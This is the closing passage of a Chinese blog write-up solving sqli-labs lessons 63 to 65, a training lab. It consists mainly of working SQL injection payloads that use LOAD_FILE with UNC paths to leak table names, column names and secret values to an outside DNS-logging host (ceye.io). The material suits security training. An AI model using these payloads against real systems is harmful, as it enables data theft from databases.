
得到 ud7yymnibx

?id=1' and if(1,(SELECT LOAD_FILE(CONCAT('\\',(SELECT column_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' and column_NAME like 'sec%' limit 0,1),'.xxxxxx.ceye.io\abc'))),1)--+

得到 secret_5YDC

?id=1' and if(1,(SELECT LOAD_FILE(CONCAT('\\',(SELECT secret_5YDC FROM challenges.ud7yymnibx limit 0,1),'.xxxxxx.ceye.io\abc'))),1)--+

1
2
3

## Day68-Less64
### 分析

和 62 一样,要么盲注,要么 DSN

?id=1)) and if((SELECT LOAD_FILE(CONCAT('\\',(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' limit 0,1),'.xxxxxx.ceye.io\abc'))),1,1)--+

得到 ex06wyovlw

?id=1)) and if(1,(SELECT LOAD_FILE(CONCAT('\\',(SELECT column_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' and column_NAME like 'sec%' limit 0,1),'.xxxxxx.ceye.io\abc'))),1)--+

得到 secret_G074

?id=1)) and if(1,(SELECT LOAD_FILE(CONCAT('\\',(SELECT secret_G074 FROM challenges.ex06wyovlw limit 0,1),'.xxxxxx.ceye.io\abc'))),1)--+

1
2
3

## Day69-Less65
### 分析

和 62 一样,要么盲注,要么 DSN

?id=1") and if((SELECT LOAD_FILE(CONCAT('\\',(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' limit 0,1),'.xxxxxx.ceye.io\abc'))),1,1)--+

得到 gfpke05sif

?id=1") and if(1,(SELECT LOAD_FILE(CONCAT('\\',(SELECT column_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' and column_NAME like 'sec%' limit 0,1),'.xxxxxx.ceye.io\abc'))),1)--+

得到 secret_SWQ8

?id=1") and if(1,(SELECT LOAD_FILE(CONCAT('\\',(SELECT secret_SWQ8 FROM challenges.gfpke05sif limit 0,1),'.xxxxxx.ceye.io\abc'))),1)--+
```

心得

sql 注入不仅仅局限于某种姿势,只有触类旁通才能熟练掌握
做这个 lab 的时候要手工注入,或者自己写脚本,不要用 sqlmap 之类的


来呀快活呀


SqliLab 题解
https://www.tr0y.wang/2017/12/11/SqliLab/
作者
Tr0y
发布于
2017年12月11日
更新于
2024年6月3日
许可协议